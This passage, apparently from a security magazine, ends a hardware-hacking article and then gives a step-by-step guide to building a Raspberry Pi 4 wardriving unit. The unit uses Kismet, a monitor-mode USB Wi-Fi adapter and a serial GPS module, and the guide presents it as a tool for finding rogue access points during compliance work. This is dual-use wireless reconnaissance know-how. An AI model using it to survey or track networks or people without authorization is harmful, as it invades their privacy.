12 https://www.gracefulsecurity.com/jtagulator-introduction/
111
Hardware Hacking
13 https://rusolut.com/direct-access-to-nand-and-physical-image-extraction/
14 https://rusolut.com/xor-scrambler-key-extraction/
112
Hardware Hacking
Conclusion
The new age of hardware is changing everything. Unfortunately, many industries, consumer and commercial
technology device owners and infrastructure operators are fast discovering themselves at the precipice of a security
nightmare. The drive to make all devices "smart" is creating a frenzy of opportunity for cyber-criminals, nation-state
actors and security researchers alike. These threats will only grow in their potential impact on the economy,
corporations, business transactions, individual privacy and safety.
Now consider the world of the hardware devices with embedded systems like smart refrigerators, connected washing
machines, automobiles, wearables, implantable medical devices, factory robotics systems and just about anything
newly connected over networks. Historically, many of these industries never had to be concerned with security.
Given the above, this article explored the hardware hacking theme by illustrating how an attacker can compromise the
security of a hardware device and modify its factory settings by customizing them for their purposes.
113
Hardware Hacking
References:
• ACPO. Good Practice Guide for Computer-Based Electronic Evidence: Official Release
version. Available at:
http://www.7safe.com/electronic_evidence/ACPO_guidelines_computer_evidence.pdf.
• H. Bos, S. Ioannidis, E. Jonsson, E. Kirda and C. Kruegel. Future Threats To Future Trust, In
Future of Trust in Computing Anonymous. Springer, 2009.
• L. Coetzee and G. Olivrin. Inclusion Through The Internet Of Things. Assistive Technologies,
Fernando Auat Cheein, 2012.
• M. Dlamini, M. Eloff and J. Eloff. Internet Of Things: Emerging And Future Scenarios From An
Information Security Perspective. Springer, 2009.
114
Wardriving,
rebooted and
updated, part 1,
let’s get started!
Paul Mellen
ABOUT THE AUTHOR
Paul Mellen
Paul has worked in the IT Industry for almost 25 years, over 15 of those in IT
is qualified and certified in all of those areas and now passes on that
possible.
116
Wardriving, rebooted and updated, part 1, let’s get started!
Introduction
In hacker folklore, Wardriving gained its name from Wardialing, which first came into public awareness in the 1983
film "Wargames" (certainly public awareness is different to the heightened awareness that the hackers of then and now
enjoy!). In the film, the protagonist used his computer to dial a huge quantity of telephone numbers in search of phone
connected computer systems.
Similarly, wardriving is the art, some would say sport, of discovering Wi-Fi devices (as opposed to devices connected
or networked via the phone system). As such, Wardriving and Wi-Fi discovery is a topic that has always fascinated
security professionals. Primarily because Wi-Fi networks, even with encryption enabled, should be considered as
“open” networks, this is, in fact, the philosophy of PCI DSS and other mainstream IT security compliance standards!
The concepts, hardware, and software used to perform wardriving are now well established. The hardware
components used can be considered "Commercial Off The Shelf” (COTS) and are readily available. However, careful
selection of said components is required, to ensure that the hardware not only functions as required, but also that all
elements interact correctly together.
The intrigue and fascination have recently been reinforced by the University of Washington’s SeaGlass project
(https://seaglass.cs.washington.edu/), which very obviously uses many of the concepts of Wardriving, clearly with
some differences to support the different use case, especially for the technologies used.
2019 has been a year where several key announcements have necessitated the need to renew and refresh the hardware
and software used for wardriving and Wi-Fi discovery. In early 2019, Kismet, which is widely regarded as the blue
ribbon Wi-Fi discovery software, underwent major upgrades in architecture and usability, together with increased
support of different wireless devices, not just Wi-Fi devices! In June 2019, The Raspberry Pi foundation released the
Raspberry Pi 4 Model B, with many upgrades to performance (the relevant upgrades are detailed below).
It is this combination of Raspberry Pi 4 Model B and the new version of Kismet that this article covers, with a full and
comprehensive guide to installation, configuration and setup, that will enable the reader to accurately, precisely and
efficiently discover Wi-Fi networks. Furthermore, using the concepts detailed here in this article will arm the reader
with the expertise to work with other wireless technologies, for example, Bluetooth, using specialised, dedicated
wireless capture hardware.
It is rare in the world of PCI DSS compliance that cardholder data is conveyed through a regular Wi-Fi network. If
wireless is used, typically different channels, frequencies, and protocols are used. However, this does not diminish the
necessity for Wi-Fi discovery in the context of PCI DSS (or other compliance standards). Determining whether an
individual, well-meaning or malicious, has attached a Wi-Fi device, without permission or “out of policy”, either
117
Wardriving, rebooted and updated, part 1, let’s get started!
directly to a network, a so-called rogue access point or connect a Wi-Fi device to a computer system, needs to be
identified, located and if determined illegitimate, disconnected and removed.
There are several methods to do this. One is a physical inspection of systems and the environment. This is useful when
the location of Wi-Fi devices is known and does indicate if the inspected devices have been tampered with. There are
flaws in this method though, as radio frequencies cannot be seen, so locating a "rogue" device is limited!
Many Wi-Fi manufacturers today include "built-in" Wi-Fi discovery and intrusion detection. To be reliant on Wi-Fi
manufacturers/vendor’s built-in discovery, detection and WIDS, is to be reliant on what is essentially "black box"
technology, frequently proprietary technology. Potentially with limited drill down or understanding of the
environment and how Wi-Fi signals are propagating.
Using Kismet with appropriate hardware and software addresses both of these limitations, being able to locate hidden
devices and having the capability to drill down into the data that enables a greater technical understanding of what the
actual scenario is.
This is Part 1 of a 2-part series on Wi-Fi discovery and Wardriving. This article, Part 1, details the construction,
software build, base configuration and some very useful diagnostics. The main focus of this Part 1 is the software setup
and configuration.
Part 2 will take the unit constructed in Part 1 and will cover advanced usage, data processing and reporting.
New Raspberry Pi 4
With the release of the Raspberry Pi 4 Model B came a slew of upgrades and new features. Excitingly, many new
features and improvements are still to come, for example, booting from USB rather than a micro SD card. A brief
overview of these new features and upgrades that are relevant to this guide and specifically for creating a unit for
Wi-Fi discovery, ordered as positives and negatives, are as follows:
● Positives
○ CPU – 1.5GHz 64-bit quad-core ARM Cortex-A72 CPU (ARM v8, BCM2711B0) - An increase in
processing power, which is certainly welcome.
○ RAM - 1GB, 2GB or 4GB RAM (LPDDR4) - Again, a welcome upgrade. Especially for the build and
compilation of Kismet. For this article, the higher specification 4GB model is recommended and used.
○ Gigabit ethernet - The performance of the actual ethernet port is upgraded, so now full gigabit
bandwidth/speeds for ethernet is available.
118
Wardriving, rebooted and updated, part 1, let’s get started!
○ Micro-SD card slot - Again, it is the actual bandwidth or speed of the micro SD card slot has been
increased. The microSD card reader on the Raspberry Pi 4 now has a theoretical maximum of around 50
MBps, this is double the bandwidth for a Raspberry Pi 3 B+ !
○ USB-C power - The change from micro USB to USB-C allows for a greater power. However, the
implementation is somewhat flawed in so far as not "all" USB-C power supplies and cables will function
correctly (see below for specific details).
○ USB On The Go (OTG) – The Raspberry Pi 4 USB-C has On The Go enabled, depending on how the
unit will be used, this could prove very useful for connectivity, for example an Ethernet and or mass
storage device.
○ USB device connectivity - 2x USB 3.0 ports, 2x USB 2.0 ports The USB 3.0 ports are a very welcome
addition and pave the way forward for higher speed booting from external storage devices. This feature is
a road mapped firmware update.
○ Road mapped feature – There is a road mapped feature that will be provided as a firmware update to
enable the Raspberry Pi 4 to be booted from an external storage device. This combined with the USB 3.0
upgrade will allow both non reliance on the Micro SD card and faster boot up and generally enhanced disk
I/O related performance.
The following positives are not related to the recent upgrades for the Raspberry Pi 4, however, they are indicative of
the strength in depth that the Raspberry Pi product line has developed over the years of existence. Yet still very
noteworthy and important:
○ Low cost - The cost of a Raspberry Pi 4 model B ranges from £34.00 for a 1GB version to £54.00 for the
4GB version.
○ GPIO - General Input/Output Pins - The Raspberry Pi Foundation has maintained a large degree of
compatibility between different Raspberry Pi models, as such the Raspberry Pi 4 40 pin GPIO pin out is
backwards compatible. This enables a multitude of different peripherals and accessories that can be used
and re-used. The sheer range of different peripherals is enormous, including (and, of course, not limited
to) GPS devices, mechanical switches (NOT network switches), displays, pressure sensors (potentially for
altitude) inertial sensors such as magnetometer/ compass, gyroscope and accelerometer. Many of these
peripherals and accessories are packaged to make use of the standard format of the GPIO headers,
making prototyping and development very straight forward.
○ Multiple Operating Systems - There is a broad variety of Operating Systems available for the
Raspberry Pi, focused on many different use cases, there is a version of Windows, Android, Linux, and
BSD, to name a few. For the IT Security professional, the outstanding Kali Linux is also available.
119
Wardriving, rebooted and updated, part 1, let’s get started!
○ Massive online community – A huge and varied community of IT professionals, Makers and teachers
(a consistent theme for the Raspberry Pi is to be used to teach computing) ensure a vibrant community
with plenty of support, varied and makers make ecosystem with plenty of support.
● Potential negatives
○ Power – with all of the extra resources (CPU, RAM, graphics) there is the potential for increased power
usage
○ USB C Power connector – Unfortunately, the Raspberry Pi 4 power supply circuit does not follow the
specification for USB-C completely! Hence, some power supplies (units, PSUs) with e-marked USB-C
cables will not function with the Raspberry Pi 4. Most notably, the type used by Apple MacBooks and
other laptops. Until the Raspberry Pi 4's circuit/board are revised, it is required to use non e-marked
USB-C cables, with a power supply capable of supplying 5.1V/3A.
○ Heat – The following chips start to generate significant heat under use and load; CPU, USB control,
RAM, Power regulation. If the Raspberry Pi 4 CPU heat exceeds 80°C (176°F), CPU throttling is initiated
in an attempt to reduce the temperature. If a display is visible (not including a SSH terminal), a half-full
red thermometer is presented in the upper right hand corner of the display. If the temperature exceeds
85°C (185°F), the GPU will be throttled as well as the CPU. There are several strategies to manage the heat
generated, as a minimum it is recommended to use heat sinks, however, if this is not sufficient, active
cooling should be added, too.
○ At this point, in the spirit of full disclosure and openness, there is a thought process that considers the
Raspberry Pi as a sub optimal hardware platform to run Kismet. However, the author considers this
opinion to be based on other earlier and less capable models of the Raspberry Pi, for example Raspberry
Pi Zero. As a business decision, taking into account the (above positives) increases in performance,
appropriate system configuration and tuning, combined with the low total cost of hardware and software,
the Raspberry Pi 4, with 4GB of RAM is a compelling platform to carry out Wi-Fi discovery.
Kismet is an awesome wireless tool, in fact, it's an extensive framework that facilitates wardriving, wireless discovery,
wireless sniffing, wireless network and device detection with built-in WIDS (wireless intrusion detection) capability.
Mike Kershaw, aka Dragorn (Twitter @KismetWireless), is the mastermind behind Kismet. His awesome work,
contributions, and commitment to the Open Source community over decades has been relentless. Thank you, Dragorn,
for your innovation, vision and hard work!
120
Wardriving, rebooted and updated, part 1, let’s get started!
Kismet has been in existence for more than 20 years and as such should need no introduction, REALLY, it has been a
mainstay in pen-testers and hackers tool chests for all of that time, many consider it a standard tool. According to the
“SecTools.Org: Top 125 Network Security Tools” list (https://sectools.org/) has always featured highly and currently is
ranked 11th (down slightly from 7th). Whilst other tools can provide subsets of the Kismet framework, none of the other
tools offer the ease of use, framework and comprehensive features of Kismet.
Before the 2019 releases, the previous stable version of Kismet was released in 2016, often referred to as the "legacy"
version. Whilst the "legacy version" is very capable and may be suitable for some applications, the new features and
functionality of the new releases are far too compelling to ignore. A brief summary of just some of those very
interesting new features and functionality includes:
Web-based User Interface - New, cleaner, web-based User Interface that is flexible, intuitive and enables more
complex data to be visualised. The real-time graphs are superb! Furthermore, data sources can be configured from the
web-based User Interface. All accessible from ANY network-connected system. Some screenshots are in the “quick
start” section.
REST API – The 2019 release of Kismet supports a REST-like API interface for the webserver (accessible on TCP port
2501), which accepts command and returns data.
Logging and data storage improvements - Moving away from the multiple data and log files of the "legacy"
version of Kismet, to a single sqlite3 database file.
Data sources - Not only Wi-Fi data sources are supported. An ever-increasing, Bluetooth, Software Defined Radio
(SDR) with RTL based devices, wireless mouse and keyboard support built on the Bastille Mousejack platform, to
name just a few.
Increased release cycle frequency - It's also worth noting that starting with the 2019 releases, Kismet will
attempt to move to a more frequent release cycle, possibly monthly or bi-monthly, so it can incorporate smaller
features and improvements faster.
This is just a very brief overview; Kismet is a large and comprehensive framework that just keeps getting incrementally
better and better. More details, including release details and schedule, regarding Kismet are in the appendix.
Some conventions and terminology will be used from this point on. The intention is to make reading the article more
straight forward:
• Raspberry Pi – For this article, a Raspberry Pi 4 Model B, with 4GB of RAM is recommended and being used.
Referred to as just the “Raspberry Pi”. Other Raspberry Pi’s may be used, however, there may be some
121
Wardriving, rebooted and updated, part 1, let’s get started!
restrictions, for example it is NOT recommended to compile Kismet on anything less than a Raspberry Pi 4
Model B with 4GB of RAM.
• guide – This article, specifically the sections relating to installation, configuration and setup of the Raspberry
Pi with all required software (operating system, drivers and applications).
• unit – The end product of the guide. A capable unit for Wi-Fi discovery and wardriving exercises.
• serial GPS module – This guide uses a u-Blox Neo-6M serial gps module, referred to as “serial GPS module”.
• Wi-Fi adapter – the USB Wi-Fi adapter selected by the reader, this article focuses on either the Panda
PAU09 or the Alfa AWUS036ACH.
• Command line conventions – Where there are commands that need to be entered, the command line will
be enclosed in a shaded box using the courier font, as follows:
• File modifications – Where files need to be edited, a brief description will be given enclosed in a shaded box
using the courier font. Additionally, a screenshot will be provided showing the final changes to the file. If the
file is very large, only the relevant section will be shown.
For this article, it is useful at the start to define goals and specifications for the unit. They are as follows:
• Low cost and ease of procurement of components, both hardware and software
• Use standard and freely available components, i.e. Commercial Off The Shelf (COTS)
• Use Open Source operating system and software, with ease of installation and use
• All of the components, hardware and software, have support from the “community” at large and/or from the
vendor/manufacturer
Full details of these design choices are discussed throughout this article.
Hardware
The hardware required and recommended in this article is, and by design, selected for optimal performance and all
components are readily available. Components can be sourced from mainstream online retailers, for example,
Amazon, or directly from the manufacturer.
122
Wardriving, rebooted and updated, part 1, let’s get started!
The recommended hardware (where required, with the actual make and model in brackets) are as follows:
• USB Wi-Fi adaptor, 2.4GHz and 5GHz capable (either the Panda PAU09 or Alfa AWUS039ACH)
• GPS module with serial interface (u-blox NEO-6m serial GPS module)
• Antenna, omni directional, possibly with attenuation (Kent Britain 2 - 26 GHz Planar antenna)
• Case
There are some “optional” extras, that will be useful as part of the construction and testing of the unit, some of these
are not actually required for the final build, however most makers/electronic enthusiasts will have them on hand. They
are:
• Basic Digital Voltmeter (DVM), an essential tool, entry level models are very inexpensive less than $10 USD
• Jumper cables with dupont connectors (a selection, with both male and female pins)
• Soldering iron and associated tools, for example, crimper tool, wire cutter, etc.
Raspberry Pi 4, 4GB – The 4GB version is recommended. Compiling Kismet will be more reliable, which is very
apparent when using a Raspberry Pi 3+ or a lower RAM Raspberry 4, as it is probable that Kismet compilation will fail.
In operation, depending on the amount of Wi-Fi devices in the target environment, more RAM will be advantageous
for high numbers of Wi-Fi devices. Always, more RAM is better, although this will slightly increase the total cost of the
unit.
Micro SD card – Choice of micro SD card is critical for the performance, stability and reliability of the unit. For micro
SD card selection, it is NOT a simple case of evaluating manufacturers stated performance metrics. This is mainly
because the performance metrics used by manufacturers are targeted at a different use case, i.e. for use with (still or
video) digital cameras, this use case is for large sequential file transfers. Furthermore, the SD Association
(https://www.sdcard.org/index.html), which defines micro SD card specification, defines performance metrics that
are “minimum” values, hence, micro SD cards can perform better than the specification!
Therefore, it is most useful to be able to carry out “independently”, i.e. evaluate yourself, the performance of any given
micro SD card. Furthermore, after having determined the performance, this can give vital diagnostic intelligence for
pin pointing faults and problems and eliminating what may appear to be a “bug”.
123
Wardriving, rebooted and updated, part 1, let’s get started!
There are several main considerations with the micro SD card selection, for example;
• Capacity/storage size
• Bandwidth/speed
• Reliability/longevity
Capacity/storage size – Generally speaking, and to a certain extent, this is driven by manufacturers and market
demands. In other words, there is a continuous trend to increase storage capacity and lower price (price per GB).
Bandwidth/speed – Manufacturers’ specifications for speed are based on the speed of transfer of files, especially
large files. Manufacturers are just beginning to produce specifications for read/write performance, for example the A2
standard. However, it is ALWAYS recommended to carry out performance tests, this is detailed in the appendix.
In practice, bandwidth can be subdivided by how the micro SD card is used, for example:
• To create and flash the micro SD card – The UHS II standard helps here as it does facilitate very quick
creation/flashing of the micro SD card.
• Using the micro SD card in the Raspberry Pi – Unfortunately, the Raspberry Pi does not utilise the additional
speed/bandwidth of UHS II, so there will be no benefit in operation of the unit.
Mechanical/physical connectivity issues, i.e. the capability for the micro SD card to be inserted and removed many
times, physical wear and tear on the connectors (both the micro SD card and the Raspberry Pi itself). Typically, this
should not be an issue, however, it should still be considered.
Wear levelling capability of the micro SD card. Over time, this is going to be a “fact of life”.
The above two points underline that it is prudent to have a suitable supply (or backup inventory) of micro SD cards.
USB Wi-Fi adaptor – The most critical factors determining the selection of the USB Wi-Fi adapter are;
• Driver availability/compatibility with the operating system used. MUST support “monitor mode”
124
Wardriving, rebooted and updated, part 1, let’s get started!
The most important feature for the USB adapter is “monitor mode” capability. “Monitor mode” enables the capture of
RF/Wi-Fi packets on a given channel. Kismet, by default, “channel hops” at 5 channels per second.
RP-SMA connectors are standard for Wi-Fi devices, being mandated by the FCC. The connector is easily identified, on
the USB Wi-Fi adapter there is a male pin, the antenna and or cable will be female.
Using the above guidelines does somewhat limit USB Wi-Fi adapter selection, however, two very good choices are:
• Panda PAU09
• Alfa AWUS036ACH
Interestingly, the Alfa AWUS036ACH is marketed as a high gain antenna. When the case is opened (please respect any
potential warranty issues when opening), there is a small switch that selects a high gain or lower gain operation. This
can be useful (as described in more detail below) as high gain operation can make Wi-Fi discovery difficult, from the
perspective of receiving a signal from quite a distance, i.e. “out of scope”. More details of the various gain
specifications of the AWUS036ACH can be found in the appendix.
Active antenna for the serial GPS module – GPS signals come from very far away, 15,000 km, so by the time
they reach the surface of earth they are quite weak. Also, because of the weak signal (and some other factors), a clear
view of the sky is required. Amplification of the signal is recommended, and also the use of amplification as close to
the antenna as possible, this increases the Signal to Noise Ratio (SNR). Fortunately, active antennas are freely
available, and most certainly recommended.
Antenna that is used for the USB Wi-Fi adaptor – The antenna used for Wi-Fi discovery is somewhat different
to the use case for GPS. Certainly, a good signal is required, however, not so that Wi-Fi signals are received from a mile
away, that would be out of scope. Furthermore, ONLY for discovery, an omni directional antenna is preferable, so that,
as much as is possible, the signal received is the same strength from all angles.
Also, RP-SMA connectors, as in the above specification for USB Wi-Fi adapter, means that the antenna can be
swapped out for a high gain, even directional antenna to pinpoint the location of particularly difficult devices, and, of
course, when “packet injection” tests/attacks are carried out (this is out of scope for this article, but almost certainly
will be of interest to some specialists).
125
Wardriving, rebooted and updated, part 1, let’s get started!
GPS unit - The u-blox NEO-6M is not the most modern GPS module, the most common versions have a ROM image
from 2011, which is the most up-to-date version! However, despite the age, they are suitable for Wi-Fi discovery,
inexpensive and freely available with a serial interface.
These serial GPS modules can be packaged with an integrated antenna and/or with a U.FL connector. Using the U.FL
connector, a “pig tail” can be used to connect an active antenna. In most cases, an active antenna is recommended.
Case – It is prudent to mount all of the components in a protective case. Antennas should be mounted in such a way
that they are not obstructed. Special care must be taken if the antennas are covered, as it is most likely that this will
change the antenna’s frequency response and potentially limit reception.
Power source – A detailed analysis of the current usage of the unit with different configurations is in the appendix.
In summary, a power source with 5.1 volts and a maximum current draw of 2 Amps is required. If using a power
bank/battery, the persistence of the unit will be somewhat dependent on the capacity, which is typically specified in
mAh (milliampere-hour).
Of course, the OS must be installed first, however, the other steps, can be carried out individually, though each section
must be fully completed!
● Base Operating System - Raspbian Buster will be the base Operating System (OS) used in this guide
○ Panda PAU09
○ AWUS036ACH
126
Wardriving, rebooted and updated, part 1, let’s get started!
● sqlite3 – This will be used to perform maintenance and to provide access to the Kismet database
● SSH– enabled as part of the base OS install, whilst not essential it will greatly assist with the build process
To install the base operating system, Raspbian Buster (which is based on Debian 9), download the image from:
https://www.raspberrypi.org/downloads/raspbian/
All of the above versions will work with this guide, however, some extra steps will be required with the “Lite” version.
The extra steps will be highlighted.
Burn the Raspbian image (downloaded from the above link) using BalenaEtcher;
https://www.balena.io/etcher/
This is the first part of the 3-part flashing process. Start balenaEtcher.
127
Wardriving, rebooted and updated, part 1, let’s get started!
128
Wardriving, rebooted and updated, part 1, let’s get started!
Select drive. At this point, if you have not inserted the micro SD card, do so now:
129
Wardriving, rebooted and updated, part 1, let’s get started!
With Raspbian image and micro SD card selected, click “Flash!” to flash image to micro SD card:
Flashing is in progress.
130
Wardriving, rebooted and updated, part 1, let’s get started!
The micro SD card can now be inserted in the micro SD slot on the Raspberry Pi, connect the monitor, keyboard,
mouse and finally (after connecting all of the required devices) power supply unit (PSU). If the PSU has a switch, turn
it on now. Wait for the Raspberry Pi to fully boot up.
Assumptions
It is assumed that the following is carried out after the Raspberry Pi has booted completely for the first time:
• Create a specific, dedicated user for Kismet, together with a strong, secure password
• Change the hostname from the default “raspberrypi” – Use the raspi-config utility
N.B. For this article the default “pi” user and “raspberrypi” hostname will be used. This must be
changed for operational use, however, take into consideration where it may be appropriate during
this guide.
● Set locale, time zone and keyboard layout to suit – Use the raspi-config utility
○ Before the first boot - Create a zero-length file called “ssh” in the FAT 32 partition on the micro SD card
(when mounted the FAT 32 partition is /boot)
○ After the first boot - Use the raspi-config utility to enable ssh after the initial login
131
Wardriving, rebooted and updated, part 1, let’s get started!
sudo apt-get update && sudo apt-get upgrade -y && sudo reboot
N.B. This step will be repeated several times in this guide. If the guide is followed in a single session,
from start to finish, then this step need only be carried out once.
• Install synergy (optional, however, this will enhance the user experience during the build process significantly)
Of course, other specific configurations and changes can be made to enable additional functionality, however, it is
recommended that unless it offers a distinct benefit or “quality of life” enhancement, these configurations and
additions are carried out AFTER this guide has been completed and demonstrated to function correctly.
Install gpsd
The installation and configuration of gpsd is a standalone process, so it can be completed individually, after the
Raspbian first boot, or added retrospectively.
A serial GPS module will be used. The GPS module will connect to the Raspberry Pi 4 GPIO header. By default, a serial
console is configured on the GPIO header. To correctly install the serial GPS module, the following is required:
• Enable the serial interface/port on the Raspberry Pi for the GPS module to use
• Configure gpsd
• Test
Disabling the default serial login shell, enable the serial interface
To disable the default serial console and enable serial interface ready for the serial GPS module to use:
sudo raspi-config
132
Wardriving, rebooted and updated, part 1, let’s get started!
133
Wardriving, rebooted and updated, part 1, let’s get started!
134
Wardriving, rebooted and updated, part 1, let’s get started!
Configure gpsd
• /etc/default/gpsd
• /lib/systemd/system/gpsd.socket
Edit /etc/default/gpsd:
sudo vi /etc/default/gpsd
USBAUTO=”false”
DEVICES=”/dev/serial0”
135
Wardriving, rebooted and updated, part 1, let’s get started!
sudo vi /lib/systemd/system/gpsd.socket
Remove the following line, this disables the IPv6 listener, which if configured will prevent correct startup of gpsd:
ListenStream=[::1]:2947
ListenStream=0.0.0.0:2947
Now that the configuration of gpsd has been changed, the new settings need to be activated. Either reload and restart
or simply reboot!
136
Wardriving, rebooted and updated, part 1, let’s get started!
or
sudo reboot
If it’s not already, the serial GPS module should now be connected. It is CRITICAL that the Raspberry Pi be shut down
and powered off. Full details of the “electrical” connection of the serial GPS module are provided in the appendix GPS
module wiring.
gpsmon
N.B.2. If using an SSHclient, depending on the configuration of that client, the screen may not render
correctly. For example, if using Putty, select “change settings…”, then Window -> translation, change
137
Wardriving, rebooted and updated, part 1, let’s get started!
the “remote character set” to “use font encoding”. Apply and now the gpsmon screen will render
correctly.
Wi-Fi adapters
1. Evaluate Wi-Fi adapter capability – Firstly, ensure that the Wi-Fi adapter is recognised by the
Raspberry Pi and whether the Wi-Fi adapter supports “monitor mode”. This not only serves as an
evaluation of the Wi-Fi adapters capability, it also forms the basis of unit diagnostics
2. Install AWUS036ACH drivers – The drivers and kernel modules for the AWUS036ACH are not
included in the base Raspbian installation. Therefore, the driver and kernel module need to be installed
3. Disable Wi-Fi, Bluetooth and wpa_supplicant – Wi-Fi, Bluetooth and wpa_supplicant are potential
sources of “interference/disruption” for the unit, therefore, these will be disabled
N.B. For this section of the guide, Wi-Fi, Bluetooth and wpa_supplicant must be disabled last, as is
detailed in this section.
The screenshots here are for the Panda PAU09 Wi-Fi adapter. Drivers/kernel modules are:
138
Wardriving, rebooted and updated, part 1, let’s get started!
Driver/module version
At this point, insert the Wi-Fi adapter in the USB port. Firstly, it is necessary to determine if the adapter, at a
hardware level, is visible to Raspbian:
lsusb
Next is to determine if the Wi-Fi adapter has loaded the drivers and kernel modules, using lsmod. The unfiltered
output from lsmod is quite "busy", a good way to overcome this, is to grep for lines containing cfg80211. cfg80211 is
the configuration API for 802.11 devices in Linux. As such, whichever Wi-Fi adapter is used, it will interface with
cfg80211;
N.B. In the above screenshot, rt2x00lib is used by the Panda PAU09 and brcmfmac is used by the
Raspberry Pi 4 on board Wi-Fi.
Alternatively, dmesg can be used to determine which driver has loaded. However, some care and interpretation is
needed as the driver name is not always the same as the kernel module (see the section for installing the
AWUS036ACH drivers for an example of this):
139
Wardriving, rebooted and updated, part 1, let’s get started!
Armed with the driver/kernel module name, the version (and other specific details) can be obtained. It is
recommended that a note is taken of the version number, which may help in diagnostics in the future:
As can be seen in the above screenshot, version: 2.3.0 is being used for the Panda PAU09 Wi-Fi adapter.
It is fundamental to the correct operation of the unit that the Wi-Fi adapter supports “monitor mode”. “monitor mode”
for Wi-Fi cards, also Kismet to discover Wi-Fi networks. Furthermore, not all Wi-Fi adapters are equal in this respect
and it is essential to understand if the chosen Wi-Fi adapter supports “monitor mode”.
To establish if the chosen Wi-Fi adapter is capable of “monitor mode”, the iw command is used:
140
Wardriving, rebooted and updated, part 1, let’s get started!
iw phy1 info
The screenshot above shows that the Panda PAU09 does support “monitor mode”.
A useful tool/utility is the lshw command, which is typically not installed by default:
There are many versions of the AWUS driver, the version used in this article is from the aircrack-ng project, v5.2.20.
This version of the AWUS036ACH driver works very well with the Raspberry Pi and Kismet.
141
Wardriving, rebooted and updated, part 1, let’s get started!
Reboot the unit, this completes the install of the Kernel headers for Raspbian Lite:
sudo reboot
Rename the sub-directory to include the version number of the driver so as to act as a reminder of the version used:
mv rtl8812au rtl8812au-v5.2.20
cd rtl8812au-v5.2.20/
To successfully compile and install the drivers, two files need to be edited:
1. Makefile
2. dkms-install.sh
vi Makefile
Edit:
CONFIG_PLATFORM_I386_PC = y
Edit:
CONFIG_PLATFORM_ARM64_RPI = n
142
Wardriving, rebooted and updated, part 1, let’s get started!
vi dkms-install.sh
ARCH=arm
143
Wardriving, rebooted and updated, part 1, let’s get started!
sudo ./dkms-install.sh
N.B. IF for any reason, the above steps do not work or failed, run dkms-remove.sh before re-running
dkms-install.sh.
To check and verify the installation was successful, the same process as is detailed above is used. Screenshots are for
the AWUS036ACH.
lsusb
144
Wardriving, rebooted and updated, part 1, let’s get started!
iw phy1 info
145
Wardriving, rebooted and updated, part 1, let’s get started!
The onboard Wi-Fi and Bluetooth functionality are not of use to this unit, primarily because of lack of reception
(especially when the unit is enclosed in a case), further compounded by the difficulties to add an external antenna. A
micro U.FL connector can be added to the Raspberry Pi, however, this requires an addition and modification to the
main board, the Printed Circuit Board (PCB). This is considered “out of scope” for this guide. It must be noted that the
Nexmon drivers can be used to add “monitor mode”, however, the above antenna constraints are not easily overcome.
Therefore, Wi-Fi, Bluetooth and wpa_supplicant will be disabled at this point.
edit /boot/config.txt:
sudo vi /boot/config.txt
146
Wardriving, rebooted and updated, part 1, let’s get started!
denyinterfaces wlan0
sudo vi /etc/dhcpcd.conf
sudo reboot
147
Wardriving, rebooted and updated, part 1, let’s get started!
The following part of the process is to establish that the Raspberry Pi onboard Wi-Fi is disabled.
Login and check with the IP command that the Wi-Fi adaptor is now disabled:
ip addr show
As can be seen above, the “onboard” wlan0 is not present. The “onboard” Wi-Fi is now disabled.
hcitool dev
The above screenshot shows that wpa_supplicant has been successfully disabled.
The installation of Kismet will use the latest stable release (as of September 2019), version 2019-09-R1. The process is
straightforward:
148
Wardriving, rebooted and updated, part 1, let’s get started!
• Install dependencies
• Configure
cd ~
wget https://www.kismetwireless.net/code/kismet-2019-09-
R1.tar.xz
tar -xvf kismet-2019-09-R1.tar.xz
cd kismet-2019-09-R1/
Compilation process:
./configure
make -j$(nproc)
149
Wardriving, rebooted and updated, part 1, let’s get started!
N.B. This guide is using the default “pi” user, it is recommended that a new user is created, combined
with a strong password, therefore, as appropriate, make changes for this step.
groups
• Binaries - /usr/local/bin/
Kismet configuration
Further configurations need to be made so as to be able to run Kismet from the command line with minimal, if any,
command line options. The ultimate objective is to be able to run Kismet with no command line arguments.
Some specific configurations need to be made to run Kismet, some of which can be specified as part of command line
options, however, these should never be used or considered once a working installation is completed.
Therefore, the Wi-Fi interface (which has “monitor mode”), gpsd and a constant location for the output files need to be
configured.
1. Use the specific configuration file (as per the table below)
2. Make a kismet_site.conf
The second option is preferred, to write/make a kismet_site.conf file, as there are limited configurations and using the
kismet_site.conf, a single file is edited and maintained.
150
Wardriving, rebooted and updated, part 1, let’s get started!
sudo vi /usr/local/etc/kismet_site.conf
Kismet is now ready to be tested and run for the first time.
Now that gpsd, Wi-Fi adapter and Kismet have all been installed and configured, next is to run Kismet and ensure that
all is functioning correctly and as expected. To run Kismet, simply type kismet at the command prompt:
kismet
If Kismet throws errors, since the Kismet logs have been integrated into the Kismet sqlite database file, checking the
logs with a sqlite3 browser is the easiest method (please see the appendix for a suggestion), and the first place to look
for further diagnostic information.
Now that the Kismet installation has been tested and is functioning as expected, it’s time to view the new Kismet UI.
To access the Kismet UI, open a browser and go to http://kismet _instance_IP:2501; for this example and the
following screenshots, the Kismet instance is running on 192.168.2.122, so http://192.168.2.122:2501 is used.
When accessing the Kismet instance for the first time, a new user and password prompt is presented.
151
Wardriving, rebooted and updated, part 1, let’s get started!
After setting the Kismet UI new user and password, the home page is rendered, displaying a panel with discovered
devices. Beneath that panel is a “switchable” panel, “switchable” between “Messages” and “Channels”.
Switching the lower panel to “channels” displays the current “channels” being monitored. This is a snapshot, so will
change over time and channel hopping.
152
Wardriving, rebooted and updated, part 1, let’s get started!
A device in the “discovered devices” panel can be highlighted and selected with a “right mouse” click to display more
detailed information of that device.
153
Wardriving, rebooted and updated, part 1, let’s get started!
The “hamburger” in the top left corner of the screen can be selected to show “Settings”, “Data Sources”, “Memory
Monitor” and “Channel Coverage”.
Selecting “Data Sources” shows the various details for the data source, read Wi-Fi adapter, that has been configured
previously in this guide, interestingly, showing the channels that are available for monitoring!
154
Wardriving, rebooted and updated, part 1, let’s get started!
The Raspberry Pi used has a total of 4GB RAM, so it is important to be familiar with the “Memory Monitor” panel. In
this example, it can be seen with over 2500 devices and stable memory utilisation.
155
Wardriving, rebooted and updated, part 1, let’s get started!
Kismet now uses a sqlite3 database for data and logging. Under certain conditions, for example, Kismet suddenly
terminating, it is probable that as Kismet terminates, it leaves two files, the main sqlite3 database and a journal file,
which is a temporary database file created by SQLite database management system
To combine the two files, they need to be “vacuumed”. Using sqlite3 that was previously installed is straight forward
from the command line on the Raspberry Pi
After running the above command, a single, complete sqlite3 database file is generated. The generated file can then be
accessed using a sqlite3 browser, Python, etc…
Conclusion
Wardriving and Wi-Fi discovery is alive and kicking! In fact, this article clearly demonstrates that with low cost
